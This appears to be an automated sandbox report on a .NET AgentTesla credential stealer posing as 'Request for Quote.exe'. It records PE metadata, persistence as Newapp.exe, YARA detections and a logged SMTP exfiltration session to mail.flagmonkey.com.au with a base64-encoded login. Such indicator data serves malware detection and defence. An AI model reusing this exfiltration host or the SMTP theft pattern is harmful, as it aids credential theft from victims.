Entrypoint:	0x49fb7e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6034D6BC [Tue Feb 23 10:19:40 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9fb24	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa0000	0x10f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9db84	0x9dc00	False	0.776480165412	data	7.52597216215	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xa0000	0x10f8	0x1200	False	0.377821180556	data	4.91022676155	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa2000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xa00a0	0x32e	data
RT_MANIFEST	0xa03d0	0xd25	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2013
Assembly Version	1.0.0.23
InternalName	OpFlags.exe
FileVersion	1.0.0.23
CompanyName
LegalTrademarks
Comments
ProductName	QuNectRestore
ProductVersion	1.0.0.23
FileDescription	QuNectRestore
OriginalFilename	OpFlags.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-15:31:18.510002	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49740	587	192.168.2.5	223.130.27.213
02/23/21-15:31:22.308452	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49741	587	192.168.2.5	223.130.27.213

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 15:31:14.083455086 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:14.407031059 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:14.407360077 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:16.218182087 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:16.218624115 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:16.539527893 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:16.542448997 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:16.865164995 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:16.865992069 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:17.208327055 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:17.257059097 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:17.270962954 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:17.592144012 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:17.592751026 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:17.918284893 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:17.918699026 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:18.241024971 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:18.241070986 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:18.288373947 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:18.510001898 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:18.510113001 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:18.510174036 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:18.510241032 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:18.831108093 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:18.831155062 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:18.840020895 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:18.882177114 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:19.499588966 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:19.828087091 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:19.828211069 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:19.828939915 CET	49740	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:19.829303980 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:20.131218910 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:20.131370068 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:20.149321079 CET	587	49740	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:20.462553024 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:20.462721109 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:20.765268087 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:20.765541077 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:21.068038940 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:21.068315029 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:21.393064976 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:21.393403053 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:21.696835995 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:21.697057962 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:22.002580881 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:22.003891945 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:22.305927992 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:22.306037903 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:22.308420897 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:22.308451891 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:22.308484077 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:22.308597088 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:22.308610916 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:22.308629036 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:22.308657885 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:22.308713913 CET	49741	587	192.168.2.5	223.130.27.213
Feb 23, 2021 15:31:22.611869097 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:22.611886978 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:22.611898899 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:22.623078108 CET	587	49741	223.130.27.213	192.168.2.5
Feb 23, 2021 15:31:22.664485931 CET	49741	587	192.168.2.5	223.130.27.213

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 15:29:06.565676928 CET	61805	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:06.616029024 CET	53	61805	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:07.394705057 CET	54795	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:07.451915026 CET	53	54795	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:08.194761038 CET	49557	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:08.253489971 CET	53	49557	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:08.377248049 CET	61733	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:08.428294897 CET	53	61733	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:09.196311951 CET	65447	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:09.250636101 CET	53	65447	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:10.084043980 CET	52441	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:10.143239021 CET	53	52441	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:11.400106907 CET	62176	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:11.457536936 CET	53	62176	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:12.333396912 CET	59596	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:12.384962082 CET	53	59596	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:13.174443960 CET	65296	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:13.226183891 CET	53	65296	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:13.996594906 CET	63183	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:14.045241117 CET	53	63183	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:17.098606110 CET	60151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:17.152112961 CET	53	60151	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:18.367099047 CET	56969	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:18.418884993 CET	53	56969	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:32.176197052 CET	55161	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:32.236157894 CET	53	55161	8.8.8.8	192.168.2.5
Feb 23, 2021 15:29:44.198600054 CET	54757	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:29:44.250086069 CET	53	54757	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:03.046304941 CET	49992	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:03.095330954 CET	53	49992	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:09.372313023 CET	60075	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:09.423938990 CET	53	60075	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:17.179866076 CET	55016	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:17.238629103 CET	53	55016	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:36.548773050 CET	64345	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:36.643322945 CET	53	64345	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:37.226339102 CET	57128	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:37.344394922 CET	53	57128	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:37.987951040 CET	54791	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:38.023211002 CET	50463	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:38.058527946 CET	53	54791	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:38.083316088 CET	53	50463	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:38.582964897 CET	50394	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:38.649486065 CET	53	50394	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:39.181505919 CET	58530	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:39.256371021 CET	53	58530	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:39.879367113 CET	53813	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:39.939624071 CET	53	53813	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:40.568761110 CET	63732	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:40.628432989 CET	53	63732	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:41.681197882 CET	57344	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:41.731914997 CET	53	57344	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:43.220309973 CET	54450	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:43.283684015 CET	53	54450	8.8.8.8	192.168.2.5
Feb 23, 2021 15:30:43.874125004 CET	59261	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:30:43.931221962 CET	53	59261	8.8.8.8	192.168.2.5
Feb 23, 2021 15:31:12.938155890 CET	57151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:31:13.318022013 CET	53	57151	8.8.8.8	192.168.2.5
Feb 23, 2021 15:31:13.710692883 CET	59413	53	192.168.2.5	8.8.8.8
Feb 23, 2021 15:31:13.917537928 CET	53	59413	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 15:31:12.938155890 CET	192.168.2.5	8.8.8.8	0xe8b6	Standard query (0)	mail.flagmonkey.com.au	A (IP address)	IN (0x0001)
Feb 23, 2021 15:31:13.710692883 CET	192.168.2.5	8.8.8.8	0x9ca1	Standard query (0)	mail.flagmonkey.com.au	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 23, 2021 15:31:13.318022013 CET	8.8.8.8	192.168.2.5	0xe8b6	No error (0)	mail.flagmonkey.com.au	flagmonkey.com.au		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 15:31:13.318022013 CET	8.8.8.8	192.168.2.5	0xe8b6	No error (0)	flagmonkey.com.au		223.130.27.213	A (IP address)	IN (0x0001)
Feb 23, 2021 15:31:13.917537928 CET	8.8.8.8	192.168.2.5	0x9ca1	No error (0)	mail.flagmonkey.com.au	flagmonkey.com.au		CNAME (Canonical name)	IN (0x0001)
Feb 23, 2021 15:31:13.917537928 CET	8.8.8.8	192.168.2.5	0x9ca1	No error (0)	flagmonkey.com.au		223.130.27.213	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 23, 2021 15:31:16.218182087 CET	587	49740	223.130.27.213	192.168.2.5	220-c1s2-3m-mel.hosting-services.net.au ESMTP Exim 4.93 #2 Wed, 24 Feb 2021 01:31:15 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 23, 2021 15:31:16.218624115 CET	49740	587	192.168.2.5	223.130.27.213	EHLO 035347
Feb 23, 2021 15:31:16.539527893 CET	587	49740	223.130.27.213	192.168.2.5	250-c1s2-3m-mel.hosting-services.net.au Hello 035347 [84.17.52.38] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 23, 2021 15:31:16.542448997 CET	49740	587	192.168.2.5	223.130.27.213	AUTH login amF5ekBmbGFnbW9ua2V5LmNvbS5hdQ==
Feb 23, 2021 15:31:16.865164995 CET	587	49740	223.130.27.213	192.168.2.5	334 UGFzc3dvcmQ6
Feb 23, 2021 15:31:17.208327055 CET	587	49740	223.130.27.213	192.168.2.5	235 Authentication succeeded
Feb 23, 2021 15:31:17.270962954 CET	49740	587	192.168.2.5	223.130.27.213	MAIL FROM:<jayz@flagmonkey.com.au>
Feb 23, 2021 15:31:17.592144012 CET	587	49740	223.130.27.213	192.168.2.5	250 OK
Feb 23, 2021 15:31:17.592751026 CET	49740	587	192.168.2.5	223.130.27.213	RCPT TO:<jayz@flagmonkey.com.au>
Feb 23, 2021 15:31:17.918284893 CET	587	49740	223.130.27.213	192.168.2.5	250 Accepted
Feb 23, 2021 15:31:17.918699026 CET	49740	587	192.168.2.5	223.130.27.213	DATA
Feb 23, 2021 15:31:18.241070986 CET	587	49740	223.130.27.213	192.168.2.5	354 Enter message, ending with "." on a line by itself
Feb 23, 2021 15:31:18.510241032 CET	49740	587	192.168.2.5	223.130.27.213	.
Feb 23, 2021 15:31:18.840020895 CET	587	49740	223.130.27.213	192.168.2.5	250 OK id=1lEYib-000xdk-K4
Feb 23, 2021 15:31:19.499588966 CET	49740	587	192.168.2.5	223.130.27.213	QUIT
Feb 23, 2021 15:31:19.828087091 CET	587	49740	223.130.27.213	192.168.2.5	221 c1s2-3m-mel.hosting-services.net.au closing connection
Feb 23, 2021 15:31:20.462553024 CET	587	49741	223.130.27.213	192.168.2.5	220-c1s2-3m-mel.hosting-services.net.au ESMTP Exim 4.93 #2 Wed, 24 Feb 2021 01:31:19 +1100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 23, 2021 15:31:20.462721109 CET	49741	587	192.168.2.5	223.130.27.213	EHLO 035347
Feb 23, 2021 15:31:20.765268087 CET	587	49741	223.130.27.213	192.168.2.5	250-c1s2-3m-mel.hosting-services.net.au Hello 035347 [84.17.52.38] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 23, 2021 15:31:20.765541077 CET	49741	587	192.168.2.5	223.130.27.213	AUTH login amF5ekBmbGFnbW9ua2V5LmNvbS5hdQ==
Feb 23, 2021 15:31:21.068038940 CET	587	49741	223.130.27.213	192.168.2.5	334 UGFzc3dvcmQ6
Feb 23, 2021 15:31:21.393064976 CET	587	49741	223.130.27.213	192.168.2.5	235 Authentication succeeded
Feb 23, 2021 15:31:21.393403053 CET	49741	587	192.168.2.5	223.130.27.213	MAIL FROM:<jayz@flagmonkey.com.au>
Feb 23, 2021 15:31:21.696835995 CET	587	49741	223.130.27.213	192.168.2.5	250 OK
Feb 23, 2021 15:31:21.697057962 CET	49741	587	192.168.2.5	223.130.27.213	RCPT TO:<jayz@flagmonkey.com.au>
Feb 23, 2021 15:31:22.002580881 CET	587	49741	223.130.27.213	192.168.2.5	250 Accepted
Feb 23, 2021 15:31:22.003891945 CET	49741	587	192.168.2.5	223.130.27.213	DATA
Feb 23, 2021 15:31:22.306037903 CET	587	49741	223.130.27.213	192.168.2.5	354 Enter message, ending with "." on a line by itself
Feb 23, 2021 15:31:22.308713913 CET	49741	587	192.168.2.5	223.130.27.213	.
Feb 23, 2021 15:31:22.623078108 CET	587	49741	223.130.27.213	192.168.2.5	250 OK id=1lEYif-000xhu-Ml

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Request for Quote.exe PID: 2260 Parent PID: 5740

General

Start time:	15:29:28
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\Request for Quote.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Request for Quote.exe'
Imagebase:	0x280000
File size:	651776 bytes
MD5 hash:	40CB5C4488FFF6E0C040FF45CBA91ECF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.249097967.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.249616180.0000000003DB9000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Request for Quote.exe PID: 6376 Parent PID: 2260

General

Start time:	15:29:37
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\Request for Quote.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Request for Quote.exe
Imagebase:	0xc40000
File size:	651776 bytes
MD5 hash:	40CB5C4488FFF6E0C040FF45CBA91ECF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.504112296.0000000003061000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.495978831.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Newapp.exe PID: 996 Parent PID: 3472

General

Start time:	15:30:11
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Newapp\Newapp.exe'
Imagebase:	0xa80000
File size:	651776 bytes
MD5 hash:	40CB5C4488FFF6E0C040FF45CBA91ECF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.346647833.0000000004839000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000002.345433821.000000000303E000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Newapp.exe PID: 6400 Parent PID: 996

General

Start time:	15:30:16
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Imagebase:	0x280000
File size:	651776 bytes
MD5 hash:	40CB5C4488FFF6E0C040FF45CBA91ECF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Newapp.exe PID: 5592 Parent PID: 996

General

Start time:	15:30:17
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Imagebase:	0x50000
File size:	651776 bytes
MD5 hash:	40CB5C4488FFF6E0C040FF45CBA91ECF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Newapp.exe PID: 5484 Parent PID: 996

General

Start time:	15:30:17
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Imagebase:	0x3d0000
File size:	651776 bytes
MD5 hash:	40CB5C4488FFF6E0C040FF45CBA91ECF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Newapp.exe PID: 1188 Parent PID: 996

General

Start time:	15:30:18
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Imagebase:	0x3d0000
File size:	651776 bytes
MD5 hash:	40CB5C4488FFF6E0C040FF45CBA91ECF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: Newapp.exe PID: 6108 Parent PID: 996

General

Start time:	15:30:18
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Imagebase:	0xf10000
File size:	651776 bytes
MD5 hash:	40CB5C4488FFF6E0C040FF45CBA91ECF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.496055035.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.503874782.0000000003431000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Newapp.exe PID: 6676 Parent PID: 3472

General

Start time:	15:30:19
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\Newapp\Newapp.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Newapp\Newapp.exe'
Imagebase:	0x3f0000
File size:	651776 bytes
MD5 hash:	40CB5C4488FFF6E0C040FF45CBA91ECF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Request for Quote.exe PID: 2260 Parent PID: 5740 Request for Quote.exeCOMMON

Executed Functions

Function 0AB93238, Relevance: .9, Instructions: 905COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.255766157.000000000AB90000.00000040.00000001.sdmp, Offset: 0AB90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5cd21852fdcef8e6a61d2db71bbde2a9aa6b6499183fe4cabe5140d685c1a17
Instruction ID: b3df6e11b02b0bcdadf5fc142e19904ba1070679c5e5503f01ab1a81acd21392
Opcode Fuzzy Hash: d5cd21852fdcef8e6a61d2db71bbde2a9aa6b6499183fe4cabe5140d685c1a17
Instruction Fuzzy Hash: 53726B70A002599FDF14DF69C894AAEBBF2EF88304F1581A9E406AB361DB34DD41DF91

Uniqueness

Uniqueness Score: -1.00%

Function 02592F9A, Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.249071901.0000000002590000.00000040.00000001.sdmp, Offset: 02590000, based on PE: false

